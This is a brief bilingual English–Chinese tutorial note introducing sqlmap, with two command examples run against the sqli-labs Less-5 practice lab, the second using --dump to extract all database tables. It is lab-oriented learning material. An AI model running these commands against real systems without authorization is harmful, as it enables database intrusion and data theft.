sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
sqlmap是一个开源的渗透测试工具,它自动化了检测和利用SQL注入缺陷以及接管数据库服务器的过程。它带有一个强大的检测引擎,为终极渗透测试仪提供了许多小众功能,以及一系列开关,包括数据库指纹识别、从数据库获取数据、访问底层文件系统,以及通过带外连接在操作系统上执行命令。
https://github.com/sqlmapproject/sqlmap
以sqlilabs的第五题为例
payload1:python sqlmap.py -u http://sql.test/Less-5/?id=1
得到基本信息结果
payload2:python sqlmap.py -u http://sql.test/Less-5/?id=1 --dump
爆出字段内容(默认所有)并且会将tables存于本地